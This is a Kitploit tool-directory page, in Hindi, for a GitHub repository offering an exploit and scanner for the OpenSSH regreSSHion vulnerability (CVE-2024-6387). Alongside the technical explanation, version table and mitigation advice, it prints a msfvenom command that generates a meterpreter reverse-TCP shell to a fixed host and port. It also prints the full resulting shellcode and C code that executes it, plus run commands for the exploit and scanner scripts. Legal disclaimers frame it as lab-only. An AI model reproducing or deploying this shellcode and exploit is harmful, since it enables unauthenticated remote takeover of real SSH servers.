Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-6387 — OpenSSH में CVE-2024-6387 (regreSSHion) के लिए शोषण और स्कैनर। इसमें पता लगाना, RCE शोषण, और अधिकृत पैठ परीक्षण और प्रयोगशाला वातावरण के लिए शेलकोड उत्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/kaleth4/cve-2024-6387
भेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubkaleth4/cve-2024-6387

CVE-2024-6387

OpenSSH में CVE-2024-6387 (regreSSHion) के लिए शोषण और स्कैनर। इसमें पता लगाना, RCE शोषण, और अधिकृत पैठ परीक्षण और प्रयोगशाला वातावरण के लिए शेलकोड उत्पादन शामिल है।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
root@kitploit:~
      एक्सप्लॉइट CVE-2024-6387

💥 एक्सप्लॉइट CVE-2024-6387 (regreSSHion)

OpenSSH सर्वरों में CVE-2024-6387 भेद्यता के विश्लेषण, पता लगाने और नियंत्रित परीक्षण के लिए उपकरण।


Bash Python Ethical


⚠️ कानूनी और नैतिक चेतावनी

यह रिपॉजिटरी पूरी तरह से शैक्षिक है।
इसका उपयोग केवल इनमें करें:

  • प्रयोगशालाएँ (HTB, TryHackMe)
  • अपने स्वयं के वातावरण
  • स्पष्ट अनुमति वाले ऑडिट

⚠️ बिना अनुमति के सिस्टम को स्कैन या शोषण करना अवैध है।
यह सामग्री रक्षा और सीखने के उद्देश्य से है।


📑 विषय सूची

  • 📖 सामान्य विवरण
  • 🔍 तकनीकी विवरण
  • 📊 प्रभावित संस्करण
  • ⚙️ उपयोग
  • 🛠️ शमन
  • 📚 संदर्भ
  • 👤 लेखक
  • 📢 अस्वीकरण

📖 सामान्य विवरण

CVE-2024-6387, जिसे regreSSHion के नाम से जाना जाता है, 2006 में पहले से सुधारी गई भेद्यता (CVE-2006-5051) का पुनरावर्तन है।

इसे OpenSSH 8.5p1 (2020) में पुनः शामिल किया गया और यह अनुमति देता है:

  • रिमोट कोड निष्पादन (RCE)
  • रूट के रूप में संभावित पहुँच
  • अप्रमाणित हमला
  • उपयोगकर्ता की कोई बातचीत नहीं

एक संबंधित भेद्यता भी है:

  • CVE-2024-6409 → विशेषाधिकार पृथक्करण वाले वातावरण में चाइल्ड प्रक्रिया को प्रभावित करता है

🔍 तकनीकी विवरण

यह भेद्यता sshd के सिग्नल हैंडलर में रेस कंडीशन पर आधारित है।

🧠 कार्यप्रणाली

  1. सर्वर LoginGraceTime निर्धारित करता है (डिफ़ॉल्ट: 120s)
  2. यदि क्लाइंट प्रमाणित नहीं होता:
    • SIGALRM सिग्नल ट्रिगर होता है
  3. हैंडलर सिग्नल-असुरक्षित फ़ंक्शन निष्पादित करता है, जैसे:
    • syslog()
    • malloc()
    • free()

💣 प्रभाव

इससे हो सकता है:

  • मेमोरी भ्रष्टाचार (हीप)
  • मनमाना कोड निष्पादन

⏱️ शोषण की कठिनाई

  • ~10,000 प्रयासों की आवश्यकता (रेस कंडीशन)
  • 32-बिट सिस्टम पर:
    • 6–8 घंटे लग सकते हैं
  • कारक:
    • ASLR
    • नेटवर्क विलंबता
    • सिस्टम लोड

📊 प्रभावित संस्करण

स्थितिसंस्करणनोट्स
⚠️ असुरक्षित< 4.4p1यदि पुराना पैच नहीं है
✅ सुरक्षित4.4p1 → < 8.5p1पहले से सुधारा गया
⚠️ असुरक्षित8.5p1 → < 9.8p1पुनरावर्तन मौजूद है
✅ सुधारित>= 9.8p1आधिकारिक पैच

🛡️ OpenBSD असुरक्षित नहीं है 2001 से लागू अतिरिक्त सुरक्षा उपायों के कारण। 2 1


⚙️ उपयोग

python3 exploit.py

🔎 OpenSSH सर्वरों की स्कैनिंग

root@kitploit:~
python3 scanner.py <IP> -p 22

```bash

# शेलकोड जनरेट करना
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes

unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

कस्टम पेलोड

root@kitploit:~
#include <stdio.h>

// आपके कस्टम पेलोड का प्लेसहोल्डर
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // शेलकोड निष्पादित करें
    printf("शेलकोड निष्पादित किया जा रहा है...\n");
    void (*sc)() = (void(*)())shellcode;
    sc();

    return 0;
}

वास्तविक पेलोड

root@kitploit:~
#include <stdio.h>
 

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)


🛠️ शमन और सुधार निम्नलिखित कदम तुरंत उठाने की अनुशंसा की जाती है, विशेष रूप से इंटरनेट पर उजागर संपत्तियों के लिए:

तत्काल अद्यतन: OpenSSH 9.8p1 में अपडेट करें या प्रत्येक वितरण के विशिष्ट पैच लागू करें।

sshd कॉन्फ़िगरेशन: यदि अद्यतन संभव नहीं है, तो /etc/ssh/sshd_config फ़ाइल में LoginGraceTime 0 सेट करें।

चेतावनी: यह RCE को रोकता है, लेकिन सर्वर को कनेक्शन खत्म होने के कारण सेवा अस्वीकार (DoS) के लिए उजागर करता है।

पहुँच नियंत्रण: लेटरल मूवमेंट से बचने के लिए SSH पहुँच को नेटवर्क-आधारित नियंत्रण (फायरवॉल/VPN) और नेटवर्क सेगमेंटेशन के माध्यम से सीमित करें।

संदर्भ

  • https://www.zscaler.com/blogs/security-research/openssh-vulnerabilities-cve-2024-6387-cve-2024-6409-pose-significant
  • https://www.exploit-db.com/exploits/52269
  • https://www.offsec.com/blog/regresshion-exploit-cve-2024-6387/
  • https://github.com/xaitax/CVE-2024-6387_Check

👤 लेखक

Kaleth Corcho
सिस्टम इंजीनियरिंग · WolvesTI · बोगोटा, कोलंबिया

LinkedIn GitHub


📢 अस्वीकरण

  • महत्वपूर्ण नोट:
    • यह उपकरण केवल अधिकृत पैठ परीक्षण और रेड टीमिंग अभ्यासों के लिए विकसित और उपयोग किया जाता है। इसे glibc-आधारित Linux सिस्टम पर OpenSSH सर्वर की भेद्यताओं की पहचान और शोषण के लिए डिज़ाइन किया गया है। इस उपकरण का अनधिकृत उपयोग सख्त वर्जित है, इस उपकरण के मालिक किसी भी अनधिकृत पहुँच या दुर्भावनापूर्ण उपयोग के लिए जिम्मेदार नहीं हैं।
  • कानूनी सूचना:
    • सिस्टम या नेटवर्क पर संबंधित मालिकों से स्पष्ट प्राधिकरण के बिना इस उपकरण का अनधिकृत उपयोग लागू कानूनों और विनियमों का उल्लंघन कर सकता है। उपयोगकर्ता साइबर सुरक्षा परीक्षण और मूल्यांकन को नियंत्रित करने वाले कानूनी और नैतिक मानकों का अनुपालन सुनिश्चित करने के लिए जिम्मेदार हैं।
टूल डाउनलोड करें